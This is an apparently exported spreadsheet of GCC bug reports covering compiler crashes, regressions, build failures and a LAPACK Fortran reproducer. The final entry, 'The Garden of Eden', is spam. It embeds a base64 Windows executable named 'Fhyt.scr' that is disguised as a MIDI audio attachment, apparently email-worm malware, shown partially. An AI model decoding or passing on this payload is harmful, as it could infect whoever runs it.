end program test
recursive function stuff(n)
  integer :: stuff
  integer :: n
  stuff = 1
  if(n &lt; 5) then
    stuff = stuff+stuff(n+1)
  endif
end function stuff</t>
  </si>
  <si>
    <t>GCC-17040</t>
  </si>
  <si>
    <t>GCOV not working properly on Windows platforms</t>
  </si>
  <si>
    <t>GCOV option -l will not working properly on Windows as the code expect a UNIX
directory separator. On Windows both directory separators ('/' and '\') can be
used.
I'll attach the patch I'm proposing to fix this problem.
Pascal.</t>
  </si>
  <si>
    <t>p.obry</t>
  </si>
  <si>
    <t>GCC-516</t>
  </si>
  <si>
    <t>gcc problems</t>
  </si>
  <si>
    <t>Cannot find iostream.h is the result from running GCC after installing. Have tried several changes recommended in various web pages to no avail. Here is some information that you may be able to help me with.... [please advise any changes I am a new Linux user]....
which gcc yields /usr/bin/gcc
iostream IS located in /usr/include/srcdir/gcc-2.95.2/libio
AND /usr/local/include/g++-3/
the unpacking in srcdir directory yielded a /gcc-2.95.2/ directory for which all unpacking was done...
Thank you!
Oscar Paquette
opaque1@gl.umbc.edu
Release:
gcc 2.95.2
Environment:
pentium II 466 machine (sony)</t>
  </si>
  <si>
    <t>opaque1</t>
  </si>
  <si>
    <t>GCC-32251</t>
  </si>
  <si>
    <t>[4.1 regression] ICE on delete operator with ellipsis</t>
  </si>
  <si>
    <t>The following code snippet triggers a segfault since GCC 3.4.0:
=======================================
struct A
{
  A()
  void operator delete(void*...)
}
void foo()
{
  new A
}
=======================================
bug.cc: In function 'void foo()':
bug.cc:9: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Before we got an error message:
bug.cc: In function `void foo()':
bug.cc:9: error: no suitable `operator delete' for `A'
I'm not quite sure but I think the code is valid after all.</t>
  </si>
  <si>
    <t>GCC-45648</t>
  </si>
  <si>
    <t>[4.6 regression] Unnecessary temporary for transpose calls as actual argument.</t>
  </si>
  <si>
    <t>As explained at http://gcc.gnu.org/ml/fortran/2010-09/msg00120.html the transpose change committed at http://gcc.gnu.org/viewcvs?view=revision&amp;revision=164205 introduces unnecessary temporaries for transpose calls as actual argument.</t>
  </si>
  <si>
    <t>GCC-43359</t>
  </si>
  <si>
    <t>gas_dyn benchmark exhibits missed vectorization with graphite</t>
  </si>
  <si>
    <t>The polyhedron 2005 benchmark gas_dyn executes 230% slower when compiled with -fgraphite=identity and -ffast-math -funroll-loops -O3 on i686-apple-darwin10. The majority of the slowdown is due to reduced optimizations in the EOS subroutine of the benchmark. If that subroutine is compiled separately without-fgraphite-identity the gas_dyn benchmark only executes 57% slower. Reduced optimizations in the CHOZDT subroutine by -fgraphite-identity is due for this remaining 57% slowdown.</t>
  </si>
  <si>
    <t>GCC-50699</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap fails on *-apple-darwin* due to revision 179820</t>
  </si>
  <si>
    <t>Bootstrap fails on *-apple-darwin* due to revision 179820 (see http://gcc.gnu.org/ml/gcc-regression/2011-10/txt00000.txt ):
/Users/regress/tbox/native/build/./prev-gcc/g++ -B/Users/regress/tbox/native/build/./prev-gcc/ -B/Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/bin/ -nostdinc++ -B/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/src/.libs -B/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/libsupc++/.libs -I/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/include/powerpc-apple-darwin9.8.0 -I/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/include -I/Users/regress/tbox/svn-gcc/libstdc++-v3/libsupc++ -L/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/src/.libs -L/Users/regress/tbox/native/build/prev-powerpc-apple-darwin9.8.0/libstdc++-v3/libsupc++/.libs -c   -g -O2 -mdynamic-no-pic -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  
 -DHAVE_CONFIG_H -I. -I. -I/Users/regress/tbox/svn-gcc/gcc -I/Users/regress/tbox/svn-gcc/gcc/. -I/Users/regress/tbox/svn-gcc/gcc/../include -I./../intl -I/Users/regress/tbox/svn-gcc/gcc/../libcpp/include  -I/Users/regress/tbox/svn-gcc/gcc/../libdecnumber -I/Users/regress/tbox/svn-gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I/Users/regress/tbox/svn-gcc/gcc -I/Users/regress/tbox/svn-gcc/gcc/. -I/Users/regress/tbox/svn-gcc/gcc/../include -I./../intl -I/Users/regress/tbox/svn-gcc/gcc/../libcpp/include  -I/Users/regress/tbox/svn-gcc/gcc/../libdecnumber -I/Users/regress/tbox/svn-gcc/gcc/../libdecnumber/dpd -I../libdecnumber   \
		/Users/regress/tbox/svn-gcc/gcc/config/darwin.c
/Users/regress/tbox/svn-gcc/gcc/config/darwin.c: In function 'void darwin_patch_builtin(int)':
/Users/regress/tbox/svn-gcc/gcc/config/darwin.c:2965:42: error: invalid conversion from 'int' to 'built_in_function' [-fpermissive]
/Users/regress/tbox/svn-gcc/gcc/config/darwin.c:2977:37: error: invalid conversion from 'int' to 'built_in_function' [-fpermissive]</t>
  </si>
  <si>
    <t>GCC-42771</t>
  </si>
  <si>
    <t>[4.5 Regression][graphite] ICE: in graphite_loop_normal_form at graphite-sese-to-poly.c (2)</t>
  </si>
  <si>
    <t>The original unreduced testcase from pr42521 started crashing again with the same error message. Only little modification to the reduced testcase is needed to reproduce it.
Command line:
gcc -O3 -fgraphite-identity -c testcase.c
Tested revisions (x86_64):
r155945 - crash (x86)
r155938 - crash
r155902 - crash
- r155881 - pr42732 fix (can be related)
r155844 - OK (x86)
r155833 - OK
- r155728 - pr42521 fix
r155363 - crash
Output:
$ /mnt/svn/gcc-trunk/binary-155945-x86-lto/bin/gcc -O3 -fgraphite-identity -c testcase.c
testcase.c: In function 'foo':
testcase.c:5:6: internal compiler error: in graphite_loop_normal_form at graphite-sese-to-poly.c:2844
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Valgrind:
no errors reported</t>
  </si>
  <si>
    <t>GCC-65836</t>
  </si>
  <si>
    <t>[6 Regression] gnat fails to build on aarch64-linux-gnu</t>
  </si>
  <si>
    <t>seen with r222268 aarch64-linux-gnu ada fails to build in stage2:
build/gengtype  \
                    -S ../../src/gcc -I gtyp-input.list -w tmp-gtype.state
Makefile:2402: recipe for target 's-gtype' failed
make[5]: *** [s-gtype] Segmentation fault</t>
  </si>
  <si>
    <t>GCC-7339</t>
  </si>
  <si>
    <t>ICE on simple code with GCC 3.1</t>
  </si>
  <si>
    <t>ICE on illegal code (it shifts 16 bit values &gt;&gt; 32). It only occurs with optimization. I haven't checked with 3.1.1 snapshots or HEAD.
The attached code will compile with GCC 3.0.4 (with and without optimization).
I'm compiling with g++ but I don't think there is anything C++-centric about the ICE.
Release:
GCC 3.1
Environment:
RedHat Linux 7.3 on an Athlon.
$ g++ -v
Reading specs from /usr/local/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc-3.1/configure --prefix=/usr/local/gcc-3.1 --enable-threads
Thread model: posix
gcc version 3.1
How-To-Repeat:
Compile the attached file with -O (or higher) with GCC 3.1
Here is what I get:
$ g++ -O x.cpp
x.cpp: In function `bool bigint_divcore(short unsigned int short unsigned int 
   short unsigned int short unsigned int short unsigned int short unsigned 
   int)':
x.cpp:26: warning: right shift count &gt;= width of type
x.cpp:28: warning: right shift count &gt;= width of type
x.cpp:37: Internal compiler error in simplify_subreg at simplify-rtx.c:2452
Please submit a full bug report [...]</t>
  </si>
  <si>
    <t>GCC-14738</t>
  </si>
  <si>
    <t>[3.3 regression] ICE on use of bound member pointers</t>
  </si>
  <si>
    <t>This cases an internal compiler error:
===============
struct A { void foo() {} }
template void foo(T&amp; t) {}
int main()
{
	void (A::*x)() = 
	A* a = new A
	foo(a-&gt;*x)
}
===============</t>
  </si>
  <si>
    <t>val</t>
  </si>
  <si>
    <t>GCC-16035</t>
  </si>
  <si>
    <t>[3.4 regression] [non-unit-at-a-time] internal compiler error: in gen_subprogram_die at dwarf2out.c:10798</t>
  </si>
  <si>
    <t>Happens with gcc-3.4.0 as well as CVS HEAD (3.5.0 20040617 (experimental)
compiled without any configure options besides --prefix).
Does not happen with 3.3.3 needs -g only happens with -O not -O0 or -O2.
/opt/packages/gcc-3.4.0/bin/g++ -c -g -O e.i
e.i: In function `const cln::cl_DF_div_t cln::ceiling2(const cln::cl_DF&amp;)':
e.i:489: internal compiler error: in gen_subprogram_die at dwarf2out.c:10798
With the CVS gcc version it's line dwarf2out.c:11184 same function.
BTW the source is part of cln http://www.ginac.de/CLN . With little
experience I could cut down the size of the preprocessed file to about a 4th
sorry for the remaining size.
Regards
Ralf</t>
  </si>
  <si>
    <t>GCC-27582</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE with invalid template parameter</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE since GCC 3.4.0:
===============================================
struct A
{
    template void foo()
}
template&lt;int N void (A::*)() = 
B b
===============================================
bug.cc:8: error: type/value mismatch at argument 1 in template parameter list for 'template)()&gt; struct B'
bug.cc:8: error:   expected a constant of type 'int' got 'int'
bug.cc:8: internal compiler error: tree check: expected tree_vec have error_mark in any_dependent_template_arguments_p at cp/pt.c:12751
Please submit a full bug report [etc.]
Patch on the way.</t>
  </si>
  <si>
    <t>GCC-11923</t>
  </si>
  <si>
    <t>[tree-ssa] g77 dies with ICE on legal code.</t>
  </si>
  <si>
    <t xml:space="preserve">
troutmask:sgk[207] ~/bin/g77 -c ilaenv.f
ilaenv.f: In function `ilaenv':
ilaenv.f:172: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
ilaenv.f is from the LAPACK software available from netlib.org.
Environment:
System: FreeBSD troutmask.apl.washington.edu 5.1-CURRENT FreeBSD 5.1-CURRENT #6: Fri Jul 18 09:33:32 PDT 2003 kargl@troutmask.apl.washington.edu:/usr/obj/usr/src/sys/TROUTMASK i386
host: i386-unknown-freebsd5.1
build: i386-unknown-freebsd5.1
target: i386-unknown-freebsd5.1
configured with: ../gcc/configure --enable-languages=cf95f --prefix=/home/sgk --with-gmp=/usr/local : (reconfigured) ../gcc/configure --enable-languages=cf95f77 --prefix=/home/sgk --with-gmp=/usr/local
How-To-Repeat:
See above and the following chunk of code.
      INTEGER          FUNCTION ILAENV( ISPEC NAME OPTS N1 N2 N3
     $                 N4 )
*
*  -- LAPACK auxiliary routine (version 2.0) --
*     Univ. of Tennessee Univ. of California Berkeley NAG Ltd.
*     Courant Institute Argonne National Lab and Rice University
*     September 30 1994
*
*     .. Scalar Arguments ..
      CHARACTER*( * )    NAME OPTS
      INTEGER            ISPEC N1 N2 N3 N4
*     ..
*
*  Purpose
*  =======
*
*  ILAENV is called from the LAPACK routines to choose problem-dependent
*  parameters for the local environment.  See ISPEC for a description of
*  the parameters.
*
*  This version provides a set of parameters which should give good
*  but not optimal performance on many of the currently available
*  computers.  Users are encouraged to modify this subroutine to set
*  the tuning parameters for their particular machine using the option
*  and problem size information in the arguments.
*
*  This routine will not function correctly if it is converted to all
*  lower case.  Converting it to all upper case is allowed.
*
*  Arguments
*  =========
*
*  ISPEC   (input) INTEGER
*          Specifies the parameter to be returned as the value of
*          ILAENV.
*          = 1: the optimal blocksize if this value is 1 an unblocked
*               algorithm will give the best performance.
*          = 2: the minimum block size for which the block routine
*               should be used if the usable block size is less than
*               this value an unblocked routine should be used.
*          = 3: the crossover point (in a block routine for N less
*               than this value an unblocked routine should be used)
*          = 4: the number of shifts used in the nonsymmetric
*               eigenvalue routines
*          = 5: the minimum column dimension for blocking to be used
*               rectangular blocks must have dimension at least k by m
*               where k is given by ILAENV(2...) and m by ILAENV(5...)
*          = 6: the crossover point for the SVD (when reducing an m by n
*               matrix to bidiagonal form if max(mn)/min(mn) exceeds
*               this value a QR factorization is used first to reduce
*               the matrix to a triangular form.)
*          = 7: the number of processors
*          = 8: the crossover point for the multishift QR and QZ methods
*               for nonsymmetric eigenvalue problems.
*
*  NAME    (input) CHARACTER*(*)
*          The name of the calling subroutine in either upper case or
*          lower case.
*
*  OPTS    (input) CHARACTER*(*)
*          The character options to the subroutine NAME concatenated
*          into a single character string.  For example UPLO = 'U'
*          TRANS = 'T' and DIAG = 'N' for a triangular routine would
*          be specified as OPTS = 'UTN'.
*
*  N1      (input) INTEGER
*  N2      (input) INTEGER
*  N3      (input) INTEGER
*  N4      (input) INTEGER
*          Problem dimensions for the subroutine NAME these may not all
*          be required.
*
* (ILAENV) (output) INTEGER
*          &gt;= 0: the value of the parameter specified by ISPEC
*          &lt; 0:  if ILAENV = -k the k-th argument had an illegal value.
*
*  Further Details
*  ===============
*
*  The following conventions have been used when calling ILAENV from the
*  LAPACK routines:
*  1)  OPTS is a concatenation of all of the character options to
*      subroutine NAME in the same order that they appear in the
*      argument list for NAME even if they are not used in determining
*      the value of the parameter specified by ISPEC.
*  2)  The problem dimensions N1 N2 N3 N4 are specified in the order
*      that they appear in the argument list for NAME.  N1 is used
*      first N2 second and so on and unused problem dimensions are
*      passed a value of -1.
*  3)  The parameter value returned by ILAENV is checked for validity in
*      the calling subroutine.  For example ILAENV is used to retrieve
*      the optimal blocksize for STRTRI as follows:
*
*      NB = ILAENV( 1 'STRTRI' UPLO // DIAG N -1 -1 -1 )
*      IF( NB.LE.1 ) NB = MAX( 1 N )
*
*  =====================================================================
*
*     .. Local Scalars ..
      LOGICAL            CNAME SNAME
      CHARACTER*1        C1
      CHARACTER*2        C2 C4
      CHARACTER*3        C3
      CHARACTER*6        SUBNAM
      INTEGER            I IC IZ NB NBMIN NX
*     ..
*     .. Intrinsic Functions ..
      INTRINSIC          CHAR ICHAR INT MIN REAL
*     ..
*     .. Executable Statements ..
*
      GO TO ( 100 100 100 400 500 600 700 800 ) ISPEC
*
*     Invalid value for ISPEC
*
      ILAENV = -1
      RETURN
*
  100 CONTINUE
*
*     Convert NAME to upper case if the first character is lower case.
*
      ILAENV = 1
      SUBNAM = NAME
      IC = ICHAR( SUBNAM( 1:1 ) )
      IZ = ICHAR( 'Z' )
      IF( IZ.EQ.90 .OR. IZ.EQ.122 ) THEN
*
*        ASCII character set
*
         IF( IC.GE.97 .AND. IC.LE.122 ) THEN
            SUBNAM( 1:1 ) = CHAR( IC-32 )
            DO 10 I = 2 6
               IC = ICHAR( SUBNAM( I:I ) )
               IF( IC.GE.97 .AND. IC.LE.122 )
     $            SUBNAM( I:I ) = CHAR( IC-32 )
   10       CONTINUE
         END IF
*
      ELSE IF( IZ.EQ.233 .OR. IZ.EQ.169 ) THEN
*
*        EBCDIC character set
*
         IF( ( IC.GE.129 .AND. IC.LE.137 ) .OR.
     $       ( IC.GE.145 .AND. IC.LE.153 ) .OR.
     $       ( IC.GE.162 .AND. IC.LE.169 ) ) THEN
            SUBNAM( 1:1 ) = CHAR( IC+64 )
            DO 20 I = 2 6
               IC = ICHAR( SUBNAM( I:I ) )
               IF( ( IC.GE.129 .AND. IC.LE.137 ) .OR.
     $             ( IC.GE.145 .AND. IC.LE.153 ) .OR.
     $             ( IC.GE.162 .AND. IC.LE.169 ) )
     $            SUBNAM( I:I ) = CHAR( IC+64 )
   20       CONTINUE
         END IF
*
      ELSE IF( IZ.EQ.218 .OR. IZ.EQ.250 ) THEN
*
*        Prime machines:  ASCII+128
*
         IF( IC.GE.225 .AND. IC.LE.250 ) THEN
            SUBNAM( 1:1 ) = CHAR( IC-32 )
            DO 30 I = 2 6
               IC = ICHAR( SUBNAM( I:I ) )
               IF( IC.GE.225 .AND. IC.LE.250 )
     $            SUBNAM( I:I ) = CHAR( IC-32 )
   30       CONTINUE
         END IF
      END IF
*
      C1 = SUBNAM( 1:1 )
      SNAME = C1.EQ.'S' .OR. C1.EQ.'D'
      CNAME = C1.EQ.'C' .OR. C1.EQ.'Z'
      IF( .NOT.( CNAME .OR. SNAME ) )
     $   RETURN
      C2 = SUBNAM( 2:3 )
      C3 = SUBNAM( 4:6 )
      C4 = C3( 2:3 )
*
      GO TO ( 110 200 300 ) ISPEC
*
  110 CONTINUE
*
*     ISPEC = 1:  block size
*
*     In these examples separate code is provided for setting NB for
*     real and complex.  We assume that NB will take the same value in
*     single or double precision.
*
      NB = 1
*
      IF( C2.EQ.'GE' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         ELSE IF( C3.EQ.'QRF' .OR. C3.EQ.'RQF' .OR. C3.EQ.'LQF' .OR.
     $            C3.EQ.'QLF' ) THEN
            IF( SNAME ) THEN
               NB = 32
            ELSE
               NB = 32
            END IF
         ELSE IF( C3.EQ.'HRD' ) THEN
            IF( SNAME ) THEN
               NB = 32
            ELSE
               NB = 32
            END IF
         ELSE IF( C3.EQ.'BRD' ) THEN
            IF( SNAME ) THEN
               NB = 32
            ELSE
               NB = 32
            END IF
         ELSE IF( C3.EQ.'TRI' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         END IF
      ELSE IF( C2.EQ.'PO' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         END IF
      ELSE IF( C2.EQ.'SY' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         ELSE IF( SNAME .AND. C3.EQ.'TRD' ) THEN
            NB = 1
         ELSE IF( SNAME .AND. C3.EQ.'GST' ) THEN
            NB = 64
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'HE' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            NB = 64
         ELSE IF( C3.EQ.'TRD' ) THEN
            NB = 1
         ELSE IF( C3.EQ.'GST' ) THEN
            NB = 64
         END IF
      ELSE IF( SNAME .AND. C2.EQ.'OR' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NB = 32
            END IF
         ELSE IF( C3( 1:1 ).EQ.'M' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NB = 32
            END IF
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'UN' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NB = 32
            END IF
         ELSE IF( C3( 1:1 ).EQ.'M' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NB = 32
            END IF
         END IF
      ELSE IF( C2.EQ.'GB' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               IF( N4.LE.64 ) THEN
                  NB = 1
               ELSE
                  NB = 32
               END IF
            ELSE
               IF( N4.LE.64 ) THEN
                  NB = 1
               ELSE
                  NB = 32
               END IF
            END IF
         END IF
      ELSE IF( C2.EQ.'PB' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               IF( N2.LE.64 ) THEN
                  NB = 1
               ELSE
                  NB = 32
               END IF
            ELSE
               IF( N2.LE.64 ) THEN
                  NB = 1
               ELSE
                  NB = 32
               END IF
            END IF
         END IF
      ELSE IF( C2.EQ.'TR' ) THEN
         IF( C3.EQ.'TRI' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         END IF
      ELSE IF( C2.EQ.'LA' ) THEN
         IF( C3.EQ.'UUM' ) THEN
            IF( SNAME ) THEN
               NB = 64
            ELSE
               NB = 64
            END IF
         END IF
      ELSE IF( SNAME .AND. C2.EQ.'ST' ) THEN
         IF( C3.EQ.'EBZ' ) THEN
            NB = 1
         END IF
      END IF
      ILAENV = NB
      RETURN
*
  200 CONTINUE
*
*     ISPEC = 2:  minimum block size
*
      NBMIN = 2
      IF( C2.EQ.'GE' ) THEN
         IF( C3.EQ.'QRF' .OR. C3.EQ.'RQF' .OR. C3.EQ.'LQF' .OR.
     $       C3.EQ.'QLF' ) THEN
            IF( SNAME ) THEN
               NBMIN = 2
            ELSE
               NBMIN = 2
            END IF
         ELSE IF( C3.EQ.'HRD' ) THEN
            IF( SNAME ) THEN
               NBMIN = 2
            ELSE
               NBMIN = 2
            END IF
         ELSE IF( C3.EQ.'BRD' ) THEN
            IF( SNAME ) THEN
               NBMIN = 2
            ELSE
               NBMIN = 2
            END IF
         ELSE IF( C3.EQ.'TRI' ) THEN
            IF( SNAME ) THEN
               NBMIN = 2
            ELSE
               NBMIN = 2
            END IF
         END IF
      ELSE IF( C2.EQ.'SY' ) THEN
         IF( C3.EQ.'TRF' ) THEN
            IF( SNAME ) THEN
               NBMIN = 8
            ELSE
               NBMIN = 8
            END IF
         ELSE IF( SNAME .AND. C3.EQ.'TRD' ) THEN
            NBMIN = 2
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'HE' ) THEN
         IF( C3.EQ.'TRD' ) THEN
            NBMIN = 2
         END IF
      ELSE IF( SNAME .AND. C2.EQ.'OR' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NBMIN = 2
            END IF
         ELSE IF( C3( 1:1 ).EQ.'M' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NBMIN = 2
            END IF
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'UN' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NBMIN = 2
            END IF
         ELSE IF( C3( 1:1 ).EQ.'M' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NBMIN = 2
            END IF
         END IF
      END IF
      ILAENV = NBMIN
      RETURN
*
  300 CONTINUE
*
*     ISPEC = 3:  crossover point
*
      NX = 0
      IF( C2.EQ.'GE' ) THEN
         IF( C3.EQ.'QRF' .OR. C3.EQ.'RQF' .OR. C3.EQ.'LQF' .OR.
     $       C3.EQ.'QLF' ) THEN
            IF( SNAME ) THEN
               NX = 128
            ELSE
               NX = 128
            END IF
         ELSE IF( C3.EQ.'HRD' ) THEN
            IF( SNAME ) THEN
               NX = 128
            ELSE
               NX = 128
            END IF
         ELSE IF( C3.EQ.'BRD' ) THEN
            IF( SNAME ) THEN
               NX = 128
            ELSE
               NX = 128
            END IF
         END IF
      ELSE IF( C2.EQ.'SY' ) THEN
         IF( SNAME .AND. C3.EQ.'TRD' ) THEN
            NX = 1
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'HE' ) THEN
         IF( C3.EQ.'TRD' ) THEN
            NX = 1
         END IF
      ELSE IF( SNAME .AND. C2.EQ.'OR' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NX = 128
            END IF
         END IF
      ELSE IF( CNAME .AND. C2.EQ.'UN' ) THEN
         IF( C3( 1:1 ).EQ.'G' ) THEN
            IF( C4.EQ.'QR' .OR. C4.EQ.'RQ' .OR. C4.EQ.'LQ' .OR.
     $          C4.EQ.'QL' .OR. C4.EQ.'HR' .OR. C4.EQ.'TR' .OR.
     $          C4.EQ.'BR' ) THEN
               NX = 128
            END IF
         END IF
      END IF
      ILAENV = NX
      RETURN
*
  400 CONTINUE
*
*     ISPEC = 4:  number of shifts (used by xHSEQR)
*
      ILAENV = 6
      RETURN
*
  500 CONTINUE
*
*     ISPEC = 5:  minimum column dimension (not used)
*
      ILAENV = 2
      RETURN
*
  600 CONTINUE 
*
*     ISPEC = 6:  crossover point for SVD (used by xGELSS and xGESVD)
*
      ILAENV = INT( REAL( MIN( N1 N2 ) )*1.6E0 )
      RETURN
*
  700 CONTINUE
*
*     ISPEC = 7:  number of processors (not used)
*
      ILAENV = 1
      RETURN
*
  800 CONTINUE
*
*     ISPEC = 8:  crossover point for multishift (used by xHSEQR)
*
      ILAENV = 50
      RETURN
*
*     End of ILAENV
*
      END</t>
  </si>
  <si>
    <t>GCC-9714</t>
  </si>
  <si>
    <t>The Garden of Eden</t>
  </si>
  <si>
    <t xml:space="preserve"> --K78t8C7Nk7oqv
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --K78t8C7Nk7oqv
 Content-Type: audio/x-midi
 	name=Fhyt.scr
 Content-Transfer-Encoding: base64
 Content-ID: 
 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
 RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
 GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
 UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
 QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
 ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
 AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
 QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
 AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAAB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FWL7IPsFItF
 EFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV9H0DiUX0i030uD09PT2Nffxm
 q4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOkik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UM
 K0X4mff/hdJ1G8YEMw1DxgQzCkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDwQACA4QPA4QSK
 BBCIBDOKRf2K0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L
 FTDwQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF+Jn3/4XSdQ7G
 BDMNQ8YEMwpDg0X4Ag+2Rf+LFTDwQACKBBCIBDNDg330An8FxkQz/z2A4T+F23Qehf9+GovD
 K0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bBiw0w8EAAigQIiAQzQ4N99AF/BcZEM/89i3Xs
 g8YDg23wA4l17OmI/v//X4vDXlvJw1WL7IHsEAEAAINl+ACNRfxQagRoUgJBAOjJIgAAWVlQ
 aAIAAID/FUzQQACFwA+FtwAAAFNWV7uLCUEAUFPo1CIAAFmJRfRZjYXw/v//aAQBAABQ/3X4
 /3X8/xVQ0EAAhcB1e42F8P7//1DowbUAADP/WTl99H5fV1PoaCIAAFCNhfD+//9Q6GUqAACD
 xBCFwHQ+aJMLQQD/FfTQQACL8IX2dC1qAmiTDEEA6DciAABZWVBW/xU40UAAhcB0DI2N8P7/
 /1H/dfz/0Fb/FfDQQABHO330fKH/Rfjpaf////91/P8VXNBAAF9eW8nDVYvsgewUCAAAjUUM
 VoNl/ABQ/3UMvgAEAACJdfSJdfj/dQj/FUzQQACFwHQHM8Dp7AAAAFNXv4sJQQBqAFfo5yEA
